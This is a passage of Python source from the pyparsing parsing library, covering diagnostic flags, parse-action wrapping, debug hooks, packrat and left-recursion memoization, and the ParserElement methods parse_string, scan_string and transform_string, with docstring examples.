released in a future version. By setting values in this configuration to True,
those features can be enabled in prior versions for compatibility development
and testing.
- ``collect_all_And_tokens`` - flag to enable fix for Issue #63 that fixes erroneous grouping
of results names when an :class:`And` expression is nested within an :class:`Or` or :class:`MatchFirst`;
maintained for compatibility, but setting to ``False`` no longer restores pre-2.3.1
behavior
"""
_type_desc = "compatibility"
collect_all_And_tokens = True
_all_names = [__ for __ in locals() if not __.startswith("_")]
_fixed_names = """
collect_all_And_tokens
""".split()
class __diag__(__config_flags):
_type_desc = "diagnostic"
warn_multiple_tokens_in_named_alternation = False
warn_ungrouped_named_tokens_in_collection = False
warn_name_set_on_empty_Forward = False
warn_on_parse_using_empty_Forward = False
warn_on_assignment_to_Forward = False
warn_on_multiple_string_args_to_oneof = False
warn_on_match_first_with_lshift_operator = False
enable_debug_on_named_expressions = False
_all_names = [__ for __ in locals() if not __.startswith("_")]
_warning_names = [name for name in _all_names if name.startswith("warn")]
_debug_names = [name for name in _all_names if name.startswith("enable_debug")]
@classmethod
def enable_all_warnings(cls):
for name in cls._warning_names:
cls.enable(name)
class Diagnostics(Enum):
"""
Diagnostic configuration (all default to disabled)
- ``warn_multiple_tokens_in_named_alternation`` - flag to enable warnings when a results
name is defined on a :class:`MatchFirst` or :class:`Or` expression with one or more :class:`And` subexpressions
- ``warn_ungrouped_named_tokens_in_collection`` - flag to enable warnings when a results
name is defined on a containing expression with ungrouped subexpressions that also
have results names
- ``warn_name_set_on_empty_Forward`` - flag to enable warnings when a :class:`Forward` is defined
with a results name, but has no contents defined
- ``warn_on_parse_using_empty_Forward`` - flag to enable warnings when a :class:`Forward` is
defined in a grammar but has never had an expression attached to it
- ``warn_on_assignment_to_Forward`` - flag to enable warnings when a :class:`Forward` is defined
but is overwritten by assigning using ``'='`` instead of ``'<<='`` or ``'<<'``
- ``warn_on_multiple_string_args_to_oneof`` - flag to enable warnings when :class:`one_of` is
incorrectly called with multiple str arguments
- ``enable_debug_on_named_expressions`` - flag to auto-enable debug on all subsequent
calls to :class:`ParserElement.set_name`
Diagnostics are enabled/disabled by calling :class:`enable_diag` and :class:`disable_diag`.
All warnings can be enabled by calling :class:`enable_all_warnings`.
"""
warn_multiple_tokens_in_named_alternation = 0
warn_ungrouped_named_tokens_in_collection = 1
warn_name_set_on_empty_Forward = 2
warn_on_parse_using_empty_Forward = 3
warn_on_assignment_to_Forward = 4
warn_on_multiple_string_args_to_oneof = 5
warn_on_match_first_with_lshift_operator = 6
enable_debug_on_named_expressions = 7
def enable_diag(diag_enum):
"""
Enable a global pyparsing diagnostic flag (see :class:`Diagnostics`).
"""
__diag__.enable(diag_enum.name)
def disable_diag(diag_enum):
"""
Disable a global pyparsing diagnostic flag (see :class:`Diagnostics`).
"""
__diag__.disable(diag_enum.name)
def enable_all_warnings():
"""
Enable all global pyparsing diagnostic warnings (see :class:`Diagnostics`).
"""
__diag__.enable_all_warnings()
# hide abstract class
del __config_flags
def _should_enable_warnings(
cmd_line_warn_options: List[str], warn_env_var: OptionalType[str]
) -> bool:
enable = bool(warn_env_var)
for warn_opt in cmd_line_warn_options:
w_action, w_message, w_category, w_module, w_line = (warn_opt + "::::").split(
":"
)[:5]
if not w_action.lower().startswith("i") and (
not (w_message or w_category or w_module) or w_module == "pyparsing"
):
enable = True
elif w_action.lower().startswith("i") and w_module in ("pyparsing", ""):
enable = False
return enable
if _should_enable_warnings(
sys.warnoptions, os.environ.get("PYPARSINGENABLEALLWARNINGS")
):
enable_all_warnings()
# build list of single arg builtins, that can be used as parse actions
_single_arg_builtins = {
sum,
len,
sorted,
reversed,
list,
tuple,
set,
any,
all,
min,
max,
}
_generatorType = types.GeneratorType
ParseAction = Union[
Callable[[], Any],
Callable[[ParseResults], Any],
Callable[[int, ParseResults], Any],
Callable[[str, int, ParseResults], Any],
]
ParseCondition = Union[
Callable[[], bool],
Callable[[ParseResults], bool],
Callable[[int, ParseResults], bool],
Callable[[str, int, ParseResults], bool],
]
ParseFailAction = Callable[[str, int, "ParserElement", Exception], None]
DebugStartAction = Callable[[str, int, "ParserElement", bool], None]
DebugSuccessAction = Callable[
[str, int, int, "ParserElement", ParseResults, bool], None
]
DebugExceptionAction = Callable[[str, int, "ParserElement", Exception, bool], None]
alphas = string.ascii_uppercase + string.ascii_lowercase
identchars = pyparsing_unicode.Latin1.identchars
identbodychars = pyparsing_unicode.Latin1.identbodychars
nums = "0123456789"
hexnums = nums + "ABCDEFabcdef"
alphanums = alphas + nums
printables = "".join(c for c in string.printable if c not in string.whitespace)
_trim_arity_call_line = None
def _trim_arity(func, maxargs=2):
"""decorator to trim function calls to match the arity of the target"""
global _trim_arity_call_line
if func in _single_arg_builtins:
return lambda s, l, t: func(t)
limit = 0
found_arity = False
def extract_tb(tb, limit=0):
frames = traceback.extract_tb(tb, limit=limit)
frame_summary = frames[-1]
return [frame_summary[:2]]
# synthesize what would be returned by traceback.extract_stack at the call to
# user's parse action 'func', so that we don't incur call penalty at parse time
LINE_DIFF = 11
# IF ANY CODE CHANGES, EVEN JUST COMMENTS OR BLANK LINES, BETWEEN THE NEXT LINE AND
# THE CALL TO FUNC INSIDE WRAPPER, LINE_DIFF MUST BE MODIFIED!!!!
_trim_arity_call_line = (
_trim_arity_call_line or traceback.extract_stack(limit=2)[-1]
)
pa_call_line_synth = (
_trim_arity_call_line[0],
_trim_arity_call_line[1] + LINE_DIFF,
)
def wrapper(*args):
nonlocal found_arity, limit
while 1:
try:
ret = func(*args[limit:])
found_arity = True
return ret
except TypeError as te:
# re-raise TypeErrors if they did not come from our arity testing
if found_arity:
raise
else:
tb = te.__traceback__
trim_arity_type_error = (
extract_tb(tb, limit=2)[-1][:2] == pa_call_line_synth
)
del tb
if trim_arity_type_error:
if limit <= maxargs:
limit += 1
continue
raise
# copy func name to wrapper for sensible debug output
# (can't use functools.wraps, since that messes with function signature)
func_name = getattr(func, "__name__", getattr(func, "__class__").__name__)
wrapper.__name__ = func_name
return wrapper
def condition_as_parse_action(
fn: ParseCondition, message: str = None, fatal: bool = False
):
"""
Function to convert a simple predicate function that returns ``True`` or ``False``
into a parse action. Can be used in places when a parse action is required
and :class:`ParserElement.add_condition` cannot be used (such as when adding a condition
to an operator level in :class:`infix_notation`).
Optional keyword arguments:
- ``message`` - define a custom message to be used in the raised exception
- ``fatal`` - if True, will raise :class:`ParseFatalException` to stop parsing immediately;
otherwise will raise :class:`ParseException`
"""
msg = message if message is not None else "failed user-defined condition"
exc_type = ParseFatalException if fatal else ParseException
fn = _trim_arity(fn)
@wraps(fn)
def pa(s, l, t):
if not bool(fn(s, l, t)):
raise exc_type(s, l, msg)
return pa
def _default_start_debug_action(
instring: str, loc: int, expr: "ParserElement", cache_hit: bool = False
):
cache_hit_str = "*" if cache_hit else ""
print(
(
"{}Match {} at loc {}({},{})\n {}\n {}^".format(
cache_hit_str,
expr,
loc,
lineno(loc, instring),
col(loc, instring),
line(loc, instring),
" " * (col(loc, instring) - 1),
)
)
)
def _default_success_debug_action(
instring: str,
startloc: int,
endloc: int,
expr: "ParserElement",
toks: ParseResults,
cache_hit: bool = False,
):
cache_hit_str = "*" if cache_hit else ""
print("{}Matched {} -> {}".format(cache_hit_str, expr, toks.as_list()))
def _default_exception_debug_action(
instring: str,
loc: int,
expr: "ParserElement",
exc: Exception,
cache_hit: bool = False,
):
cache_hit_str = "*" if cache_hit else ""
print(
"{}Match {} failed, {} raised: {}".format(
cache_hit_str, expr, type(exc).__name__, exc
)
)
def null_debug_action(*args):
"""'Do-nothing' debug action, to suppress debugging output during parsing."""
class ParserElement(ABC):
"""Abstract base level parser element class."""
DEFAULT_WHITE_CHARS: str = " \n\t\r"
verbose_stacktrace: bool = False
_literalStringClass: OptionalType[type] = None
@staticmethod
def set_default_whitespace_chars(chars: str):
r"""
Overrides the default whitespace chars
Example::
# default whitespace chars are space, <TAB> and newline
OneOrMore(Word(alphas)).parse_string("abc def\nghi jkl") # -> ['abc', 'def', 'ghi', 'jkl']
# change to just treat newline as significant
ParserElement.set_default_whitespace_chars(" \t")
OneOrMore(Word(alphas)).parse_string("abc def\nghi jkl") # -> ['abc', 'def']
"""
ParserElement.DEFAULT_WHITE_CHARS = chars
# update whitespace all parse expressions defined in this module
for expr in _builtin_exprs:
if expr.copyDefaultWhiteChars:
expr.whiteChars = set(chars)
@staticmethod
def inline_literals_using(cls: type):
"""
Set class to be used for inclusion of string literals into a parser.
Example::
# default literal class used is Literal
integer = Word(nums)
date_str = integer("year") + '/' + integer("month") + '/' + integer("day")
date_str.parse_string("1999/12/31") # -> ['1999', '/', '12', '/', '31']
# change to Suppress
ParserElement.inline_literals_using(Suppress)
date_str = integer("year") + '/' + integer("month") + '/' + integer("day")
date_str.parse_string("1999/12/31") # -> ['1999', '12', '31']
"""
ParserElement._literalStringClass = cls
def __init__(self, savelist: bool = False):
self.parseAction: List[ParseAction] = list()
self.failAction: OptionalType[ParseFailAction] = None
self.customName = None
self._defaultName = None
self.resultsName = None
self.saveAsList = savelist
self.skipWhitespace = True
self.whiteChars = set(ParserElement.DEFAULT_WHITE_CHARS)
self.copyDefaultWhiteChars = True
# used when checking for left-recursion
self.mayReturnEmpty = False
self.keepTabs = False
self.ignoreExprs: List["ParserElement"] = list()
self.debug = False
self.streamlined = False
# optimize exception handling for subclasses that don't advance parse index
self.mayIndexError = True
self.errmsg = ""
# mark results names as modal (report only last) or cumulative (list all)
self.modalResults = True
# custom debug actions
self.debugActions: Tuple[
OptionalType[DebugStartAction],
OptionalType[DebugSuccessAction],
OptionalType[DebugExceptionAction],
] = (None, None, None)
self.re = None
# avoid redundant calls to preParse
self.callPreparse = True
self.callDuringTry = False
self.suppress_warnings_ = []
def suppress_warning(self, warning_type: Diagnostics):
"""
Suppress warnings emitted for a particular diagnostic on this expression.
Example::
base = pp.Forward()
base.suppress_warning(Diagnostics.warn_on_parse_using_empty_Forward)
# statement would normally raise a warning, but is now suppressed
print(base.parseString("x"))
"""
self.suppress_warnings_.append(warning_type)
return self
def copy(self) -> "ParserElement":
"""
Make a copy of this :class:`ParserElement`. Useful for defining
different parse actions for the same parsing pattern, using copies of
the original parse element.
Example::
integer = Word(nums).set_parse_action(lambda toks: int(toks[0]))
integerK = integer.copy().add_parse_action(lambda toks: toks[0] * 1024) + Suppress("K")
integerM = integer.copy().add_parse_action(lambda toks: toks[0] * 1024 * 1024) + Suppress("M")
print(OneOrMore(integerK | integerM | integer).parse_string("5K 100 640K 256M"))
prints::
[5120, 100, 655360, 268435456]
Equivalent form of ``expr.copy()`` is just ``expr()``::
integerM = integer().add_parse_action(lambda toks: toks[0] * 1024 * 1024) + Suppress("M")
"""
cpy = copy.copy(self)
cpy.parseAction = self.parseAction[:]
cpy.ignoreExprs = self.ignoreExprs[:]
if self.copyDefaultWhiteChars:
cpy.whiteChars = set(ParserElement.DEFAULT_WHITE_CHARS)
return cpy
def set_results_name(
self, name: str, list_all_matches: bool = False, *, listAllMatches: bool = False
) -> "ParserElement":
"""
Define name for referencing matching tokens as a nested attribute
of the returned parse results.
Normally, results names are assigned as you would assign keys in a dict:
any existing value is overwritten by later values. If it is necessary to
keep all values captured for a particular results name, call ``set_results_name``
with ``list_all_matches`` = True.
NOTE: ``set_results_name`` returns a *copy* of the original :class:`ParserElement` object;
this is so that the client can define a basic element, such as an
integer, and reference it in multiple places with different names.
You can also set results names using the abbreviated syntax,
``expr("name")`` in place of ``expr.set_results_name("name")``
- see :class:`__call__`. If ``list_all_matches`` is required, use
``expr("name*")``.
Example::
date_str = (integer.set_results_name("year") + '/'
+ integer.set_results_name("month") + '/'
+ integer.set_results_name("day"))
# equivalent form:
date_str = integer("year") + '/' + integer("month") + '/' + integer("day")
"""
listAllMatches = listAllMatches or list_all_matches
return self._setResultsName(name, listAllMatches)
def _setResultsName(self, name, listAllMatches=False):
if name is None:
return self
newself = self.copy()
if name.endswith("*"):
name = name[:-1]
listAllMatches = True
newself.resultsName = name
newself.modalResults = not listAllMatches
return newself
def set_break(self, break_flag: bool = True) -> "ParserElement":
"""
Method to invoke the Python pdb debugger when this element is
about to be parsed. Set ``break_flag`` to ``True`` to enable, ``False`` to
disable.
"""
if break_flag:
_parseMethod = self._parse
def breaker(instring, loc, doActions=True, callPreParse=True):
import pdb
# this call to pdb.set_trace() is intentional, not a checkin error
pdb.set_trace()
return _parseMethod(instring, loc, doActions, callPreParse)
breaker._originalParseMethod = _parseMethod
self._parse = breaker
else:
if hasattr(self._parse, "_originalParseMethod"):
self._parse = self._parse._originalParseMethod
return self
def set_parse_action(
self, *fns: ParseAction, **kwargs
) -> OptionalType["ParserElement"]:
"""
Define one or more actions to perform when successfully matching parse element definition.
Parse actions can be called to perform data conversions, do extra validation,
update external data structures, or enhance or replace the parsed tokens.
Each parse action ``fn`` is a callable method with 0-3 arguments, called as
``fn(s, loc, toks)`` , ``fn(loc, toks)`` , ``fn(toks)`` , or just ``fn()`` , where:
- s = the original string being parsed (see note below)
- loc = the location of the matching substring
- toks = a list of the matched tokens, packaged as a :class:`ParseResults` object
The parsed tokens are passed to the parse action as ParseResults. They can be
modified in place using list-style append, extend, and pop operations to update
the parsed list elements; and with dictionary-style item set and del operations
to add, update, or remove any named results. If the tokens are modified in place,
it is not necessary to return them with a return statement.
Parse actions can also completely replace the given tokens, with another ``ParseResults``
object, or with some entirely different object (common for parse actions that perform data
conversions). A convenient way to build a new parse result is to define the values
using a dict, and then create the return value using :class:`ParseResults.from_dict`.
If None is passed as the ``fn`` parse action, all previously added parse actions for this
expression are cleared.
Optional keyword arguments:
- call_during_try = (default= ``False``) indicate if parse action should be run during
lookaheads and alternate testing. For parse actions that have side effects, it is
important to only call the parse action once it is determined that it is being
called as part of a successful parse. For parse actions that perform additional
validation, then call_during_try should be passed as True, so that the validation
code is included in the preliminary "try" parses.
Note: the default parsing behavior is to expand tabs in the input string
before starting the parsing process. See :class:`parse_string` for more
information on parsing strings containing ``<TAB>`` s, and suggested
methods to maintain a consistent view of the parsed string, the parse
location, and line and column positions within the parsed string.
Example::
# parse dates in the form YYYY/MM/DD
# use parse action to convert toks from str to int at parse time
def convert_to_int(toks):
return int(toks[0])
# use a parse action to verify that the date is a valid date
def is_valid_date(toks):
from datetime import date
year, month, day = toks[::2]
try:
date(year, month, day)
except ValueError:
raise ParseException("invalid date given")
integer = Word(nums)
date_str = integer + '/' + integer + '/' + integer
# add parse actions
integer.set_parse_action(convert_to_int)
date_str.set_parse_action(is_valid_date)
# note that integer fields are now ints, not strings
date_str.run_tests('''
# successful parse - note that integer fields were converted to ints
1999/12/31
# fail - invalid date
1999/13/31
''')
"""
if list(fns) == [None]:
self.parseAction = []
else:
if not all(callable(fn) for fn in fns):
raise TypeError("parse actions must be callable")
self.parseAction = list(map(_trim_arity, list(fns)))
self.callDuringTry = kwargs.get(
"call_during_try", kwargs.get("callDuringTry", False)
)
return self
def add_parse_action(self, *fns: ParseAction, **kwargs) -> "ParserElement":
"""
Add one or more parse actions to expression's list of parse actions. See :class:`set_parse_action`.
See examples in :class:`copy`.
"""
self.parseAction += list(map(_trim_arity, list(fns)))
self.callDuringTry = self.callDuringTry or kwargs.get(
"call_during_try", kwargs.get("callDuringTry", False)
)
return self
def add_condition(self, *fns: ParseCondition, **kwargs) -> "ParserElement":
"""Add a boolean predicate function to expression's list of parse actions. See
:class:`set_parse_action` for function call signatures. Unlike ``set_parse_action``,
functions passed to ``add_condition`` need to return boolean success/fail of the condition.
Optional keyword arguments:
- message = define a custom message to be used in the raised exception
- fatal = if True, will raise ParseFatalException to stop parsing immediately; otherwise will raise
ParseException
- call_during_try = boolean to indicate if this method should be called during internal tryParse calls,
default=False
Example::
integer = Word(nums).set_parse_action(lambda toks: int(toks[0]))
year_int = integer.copy()
year_int.add_condition(lambda toks: toks[0] >= 2000, message="Only support years 2000 and later")
date_str = year_int + '/' + integer + '/' + integer
result = date_str.parse_string("1999/12/31") # -> Exception: Only support years 2000 and later (at char 0),
(line:1, col:1)
"""
for fn in fns:
self.parseAction.append(
condition_as_parse_action(
fn, message=kwargs.get("message"), fatal=kwargs.get("fatal", False)
)
)
self.callDuringTry = self.callDuringTry or kwargs.get(
"call_during_try", kwargs.get("callDuringTry", False)
)
return self
def set_fail_action(self, fn: ParseFailAction) -> "ParserElement":
"""
Define action to perform if parsing fails at this expression.
Fail acton fn is a callable function that takes the arguments
``fn(s, loc, expr, err)`` where:
- s = string being parsed
- loc = location where expression match was attempted and failed
- expr = the parse expression that failed
- err = the exception thrown
The function returns no value. It may throw :class:`ParseFatalException`
if it is desired to stop parsing immediately."""
self.failAction = fn
return self
def _skipIgnorables(self, instring, loc):
exprsFound = True
while exprsFound:
exprsFound = False
for e in self.ignoreExprs:
try:
while 1:
loc, dummy = e._parse(instring, loc)
exprsFound = True
except ParseException:
pass
return loc
def preParse(self, instring, loc):
if self.ignoreExprs:
loc = self._skipIgnorables(instring, loc)
if self.skipWhitespace:
instrlen = len(instring)
white_chars = self.whiteChars
while loc < instrlen and instring[loc] in white_chars:
loc += 1
return loc
def parseImpl(self, instring, loc, doActions=True):
return loc, []
def postParse(self, instring, loc, tokenlist):
return tokenlist
# @profile
def _parseNoCache(
self, instring, loc, doActions=True, callPreParse=True
) -> Tuple[int, ParseResults]:
TRY, MATCH, FAIL = 0, 1, 2
debugging = self.debug # and doActions)
len_instring = len(instring)
if debugging or self.failAction:
# print("Match {} at loc {}({}, {})".format(self, loc, lineno(loc, instring), col(loc, instring)))
try:
if callPreParse and self.callPreparse:
pre_loc = self.preParse(instring, loc)
else:
pre_loc = loc
tokens_start = pre_loc
if self.debugActions[TRY]:
self.debugActions[TRY](instring, tokens_start, self)
if self.mayIndexError or pre_loc >= len_instring:
try:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
except IndexError:
raise ParseException(instring, len_instring, self.errmsg, self)
else:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
except Exception as err:
# print("Exception raised:", err)
if self.debugActions[FAIL]:
self.debugActions[FAIL](instring, tokens_start, self, err)
if self.failAction:
self.failAction(instring, tokens_start, self, err)
raise
else:
if callPreParse and self.callPreparse:
pre_loc = self.preParse(instring, loc)
else:
pre_loc = loc
tokens_start = pre_loc
if self.mayIndexError or pre_loc >= len_instring:
try:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
except IndexError:
raise ParseException(instring, len_instring, self.errmsg, self)
else:
loc, tokens = self.parseImpl(instring, pre_loc, doActions)
tokens = self.postParse(instring, loc, tokens)
ret_tokens = ParseResults(
tokens, self.resultsName, asList=self.saveAsList, modal=self.modalResults
)
if self.parseAction and (doActions or self.callDuringTry):
if debugging:
try:
for fn in self.parseAction:
try:
tokens = fn(instring, tokens_start, ret_tokens)
except IndexError as parse_action_exc:
exc = ParseException("exception raised in parse action")
raise exc from parse_action_exc
if tokens is not None and tokens is not ret_tokens:
ret_tokens = ParseResults(
tokens,
self.resultsName,
asList=self.saveAsList
and isinstance(tokens, (ParseResults, list)),
modal=self.modalResults,
)
except Exception as err:
# print "Exception raised in user parse action:", err
if self.debugActions[FAIL]:
self.debugActions[FAIL](instring, tokens_start, self, err)
raise
else:
for fn in self.parseAction:
try:
tokens = fn(instring, tokens_start, ret_tokens)
except IndexError as parse_action_exc:
exc = ParseException("exception raised in parse action")
raise exc from parse_action_exc
if tokens is not None and tokens is not ret_tokens:
ret_tokens = ParseResults(
tokens,
self.resultsName,
asList=self.saveAsList
and isinstance(tokens, (ParseResults, list)),
modal=self.modalResults,
)
if debugging:
# print("Matched", self, "->", ret_tokens.as_list())
if self.debugActions[MATCH]:
self.debugActions[MATCH](instring, tokens_start, loc, self, ret_tokens)
return loc, ret_tokens
def try_parse(self, instring: str, loc: int, raise_fatal: bool = False) -> int:
try:
return self._parse(instring, loc, doActions=False)[0]
except ParseFatalException:
if raise_fatal:
raise
raise ParseException(instring, loc, self.errmsg, self)
def can_parse_next(self, instring: str, loc: int) -> bool:
try:
self.try_parse(instring, loc)
except (ParseException, IndexError):
return False
else:
return True
# cache for left-recursion in Forward references
recursion_lock = RLock()
recursion_memos: DictType[
Tuple[int, "Forward", bool], Tuple[int, Union[ParseResults, Exception]]
] = {}
# argument cache for optimizing repeated calls when backtracking through recursive expressions
packrat_cache = (
{}
) # this is set later by enabled_packrat(); this is here so that reset_cache() doesn't fail
packrat_cache_lock = RLock()
packrat_cache_stats = [0, 0]
# this method gets repeatedly called during backtracking with the same arguments -
# we can cache these arguments and save ourselves the trouble of re-parsing the contained expression
def _parseCache(
self, instring, loc, doActions=True, callPreParse=True
) -> Tuple[int, ParseResults]:
HIT, MISS = 0, 1
TRY, MATCH, FAIL = 0, 1, 2
lookup = (self, instring, loc, callPreParse, doActions)
with ParserElement.packrat_cache_lock:
cache = ParserElement.packrat_cache
value = cache.get(lookup)
if value is cache.not_in_cache:
ParserElement.packrat_cache_stats[MISS] += 1
try:
value = self._parseNoCache(instring, loc, doActions, callPreParse)
except ParseBaseException as pe:
# cache a copy of the exception, without the traceback
cache.set(lookup, pe.__class__(*pe.args))
raise
else:
cache.set(lookup, (value[0], value[1].copy(), loc))
return value
else:
ParserElement.packrat_cache_stats[HIT] += 1
if self.debug and self.debugActions[TRY]:
try:
self.debugActions[TRY](instring, loc, self, cache_hit=True)
except TypeError:
pass
if isinstance(value, Exception):
if self.debug and self.debugActions[FAIL]:
try:
self.debugActions[FAIL](
instring, loc, self, value, cache_hit=True
)
except TypeError:
pass
raise value
loc_, result, endloc = value[0], value[1].copy(), value[2]
if self.debug and self.debugActions[MATCH]:
try:
self.debugActions[MATCH](
instring, loc_, endloc, self, result, cache_hit=True
)
except TypeError:
pass
return loc_, result
_parse = _parseNoCache
@staticmethod
def reset_cache() -> None:
ParserElement.packrat_cache.clear()
ParserElement.packrat_cache_stats[:] = [0] * len(
ParserElement.packrat_cache_stats
)
ParserElement.recursion_memos.clear()
_packratEnabled = False
_left_recursion_enabled = False
@staticmethod
def disable_memoization() -> None:
"""
Disables active Packrat or Left Recursion parsing and their memoization.
This method also works if neither Packrat nor Left Recursion is enabled.
This makes it safe to call before activating Packrat or Left Recursion
to clear any previous settings.
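Example (an illustrative sketch of switching memoization strategies)::
    ParserElement.enable_packrat()
    # ... later, clear packrat state before enabling bounded left-recursion
    ParserElement.disable_memoization()
    ParserElement.enable_left_recursion()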
"""
ParserElement.reset_cache()
ParserElement._left_recursion_enabled = False
ParserElement._packratEnabled = False
ParserElement._parse = ParserElement._parseNoCache
@staticmethod
def enable_left_recursion(
cache_size_limit: OptionalType[int] = None, *, force=False
) -> None:
"""
Enables "bounded recursion" parsing, which allows for both direct and indirect
left-recursion. During parsing, left-recursive :class:`Forward` elements are
repeatedly matched with a fixed recursion depth that is gradually increased
until finding the longest match.
Example::
import pyparsing as pp
pp.ParserElement.enable_left_recursion()
E = pp.Forward("E")
num = pp.Word(pp.nums)
# match `num`, or `num '+' num`, or `num '+' num '+' num`, ...
E <<= E + '+' - num | num
print(E.parse_string("1+2+3"))
Recursion search naturally memoizes matches of ``Forward`` elements and may
thus skip reevaluation of parse actions during backtracking. This may break
programs with parse actions which rely on strict ordering of side-effects.
Parameters:
- cache_size_limit - (default=``None``) - memoize at most this many
``Forward`` elements during matching; if ``None`` (the default),
memoize all ``Forward`` elements.
Bounded Recursion parsing works similarly to, but not identically to, Packrat parsing,
thus the two cannot be used together. Use ``force=True`` to disable any
previous, conflicting settings.
"""
if force:
ParserElement.disable_memoization()
elif ParserElement._packratEnabled:
raise RuntimeError("Packrat and Bounded Recursion are not compatible")
if cache_size_limit is None:
ParserElement.recursion_memos = _UnboundedMemo()
elif cache_size_limit > 0:
ParserElement.recursion_memos = _LRUMemo(capacity=cache_size_limit)
else:
raise NotImplementedError("Memo size of %s" % cache_size_limit)
ParserElement._left_recursion_enabled = True
@staticmethod
def enable_packrat(cache_size_limit: int = 128, *, force: bool = False) -> None:
"""
Enables "packrat" parsing, which adds memoizing to the parsing logic.
Repeated parse attempts at the same string location (which happens
often in many complex grammars) can immediately return a cached value,
instead of re-executing parsing/validating code. Memoizing is done of
both valid results and parsing exceptions.
Parameters:
- cache_size_limit - (default= ``128``) - if an integer value is provided
will limit the size of the packrat cache; if None is passed, then
the cache size will be unbounded; if 0 is passed, the cache will
be effectively disabled.
This speedup may break existing programs that use parse actions that
have side-effects. For this reason, packrat parsing is disabled when
you first import pyparsing. To activate the packrat feature, your
program must call the class method :class:`ParserElement.enable_packrat`.
For best results, call ``enable_packrat()`` immediately after
importing pyparsing.
Example::
import pyparsing
pyparsing.ParserElement.enable_packrat()
Packrat parsing works similarly to, but not identically to, Bounded Recursion parsing,
thus the two cannot be used together. Use ``force=True`` to disable any
previous, conflicting settings.
"""
if force:
ParserElement.disable_memoization()
elif ParserElement._left_recursion_enabled:
raise RuntimeError("Packrat and Bounded Recursion are not compatible")
if not ParserElement._packratEnabled:
ParserElement._packratEnabled = True
if cache_size_limit is None:
ParserElement.packrat_cache = _UnboundedCache()
else:
ParserElement.packrat_cache = _FifoCache(cache_size_limit)
ParserElement._parse = ParserElement._parseCache
def parse_string(
self, instring: str, parse_all: bool = False, *, parseAll: bool = False
) -> ParseResults:
"""
Parse a string with respect to the parser definition. This function is intended as the primary interface to the
client code.
:param instring: The input string to be parsed.
:param parse_all: If set, the entire input string must match the grammar.
:param parseAll: retained for pre-PEP8 compatibility, will be removed in a future release.
:raises ParseException: Raised if ``parse_all`` is set and the input string does not match the whole grammar.
:returns: the parsed data as a :class:`ParseResults` object, which may be accessed as a `list`, a `dict`, or
an object with attributes if the given parser includes results names.
If the input string is required to match the entire grammar, ``parse_all`` flag must be set to ``True``. This
is also equivalent to ending the grammar with :class:`StringEnd`().
To report proper column numbers, ``parse_string`` operates on a copy of the input string where all tabs are
converted to spaces (8 spaces per tab, as per the default in ``string.expandtabs``). If the input string
contains tabs and the grammar uses parse actions that use the ``loc`` argument to index into the string
being parsed, one can ensure a consistent view of the input string by doing one of the following:
- calling ``parse_with_tabs`` on your grammar before calling ``parse_string`` (see :class:`parse_with_tabs`),
- define your parse action using the full ``(s,loc,toks)`` signature, and reference the input string using the
parse action's ``s`` argument, or
- explicitly expand the tabs in your input string before calling ``parse_string``.
Examples:
By default, partial matches are OK.
>>> res = Word('a').parse_string('aaaaabaaa')
>>> print(res)
['aaaaa']
The parsing behavior varies by the inheriting class of this abstract class. Please refer to the children
directly to see more examples.
It raises an exception if the ``parse_all`` flag is set and ``instring`` does not match the whole grammar.
>>> res = Word('a').parse_string('aaaaabaaa', parse_all=True)
Traceback (most recent call last):
...
pyparsing.ParseException: Expected end of text, found 'b' (at char 5), (line:1, col:6)
"""
parseAll = parse_all or parseAll
ParserElement.reset_cache()
if not self.streamlined:
self.streamline()
for e in self.ignoreExprs:
e.streamline()
if not self.keepTabs:
instring = instring.expandtabs()
try:
loc, tokens = self._parse(instring, 0)
if parseAll:
loc = self.preParse(instring, loc)
se = Empty() + StringEnd()
se._parse(instring, loc)
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clearing out pyparsing internal stack trace
raise exc.with_traceback(None)
else:
return tokens
def scan_string(
self,
instring: str,
max_matches: int = _MAX_INT,
overlap: bool = False,
*,
debug: bool = False,
maxMatches: int = _MAX_INT,
) -> Generator[Tuple[ParseResults, int, int], None, None]:
"""
Scan the input string for expression matches. Each match will return the
matching tokens, start location, and end location. May be called with optional
``max_matches`` argument, to clip scanning after 'n' matches are found. If
``overlap`` is specified, then overlapping matches will be reported.
Note that the start and end locations are reported relative to the string
being parsed. See :class:`parse_string` for more information on parsing
strings with embedded tabs.
Example::
source = "sldjf123lsdjjkf345sldkjf879lkjsfd987"
print(source)
for tokens, start, end in Word(alphas).scan_string(source):
print(' '*start + '^'*(end-start))
print(' '*start + tokens[0])
prints::
sldjf123lsdjjkf345sldkjf879lkjsfd987
^^^^^
sldjf
^^^^^^^
lsdjjkf
^^^^^^
sldkjf
^^^^^^
lkjsfd
"""
maxMatches = min(maxMatches, max_matches)
if not self.streamlined:
self.streamline()
for e in self.ignoreExprs:
e.streamline()
if not self.keepTabs:
instring = str(instring).expandtabs()
instrlen = len(instring)
loc = 0
preparseFn = self.preParse
parseFn = self._parse
ParserElement.resetCache()
matches = 0
try:
while loc <= instrlen and matches < maxMatches:
try:
preloc = preparseFn(instring, loc)
nextLoc, tokens = parseFn(instring, preloc, callPreParse=False)
except ParseException:
loc = preloc + 1
else:
if nextLoc > loc:
matches += 1
if debug:
print(
{
"tokens": tokens.asList(),
"start": preloc,
"end": nextLoc,
}
)
yield tokens, preloc, nextLoc
if overlap:
nextloc = preparseFn(instring, loc)
if nextloc > loc:
loc = nextLoc
else:
loc += 1
else:
loc = nextLoc
else:
loc = preloc + 1
except ParseBaseException as exc:
if ParserElement.verbose_stacktrace:
raise
else:
# catch and re-raise exception from here, clears out pyparsing internal stack trace
raise exc.with_traceback(None)
def transform_string(self, instring: str, *, debug: bool = False) -> str:
"""
Extension to :class:`scan_string`, to modify matching text with modified tokens that may
be returned from a parse action. To use ``transform_string``, define a grammar and
attach a parse action to it that modifies the returned token list.
Invoking ``transform_string()`` on a target string will then scan for matches,
and replace the matched text patterns according to the logic in the parse
action. ``transform_string()`` returns the resulting transformed string.
Example::
wd = Word(alphas)
wd.set_parse_action(lambda toks: toks[0].title())
print(wd.transform_string("now is the winter of our discontent made glorious summer by this sun of york."))
prints::
Now Is The Winter Of Our Discontent Made Glorious Summer By This Sun Of York.
"""
out = []
lastE = 0
# force preservation of <TAB>s, to minimize unwanted transformation of string, and to
# keep string locs straight between transform_string and scan_string
self.keepTabs = True
try:
for t, s, e in self.scan_string(instring, debug=debug):
out.append(instring[lastE:s])
if t:
if isinstance(t, ParseResults):
out += t.as_list()
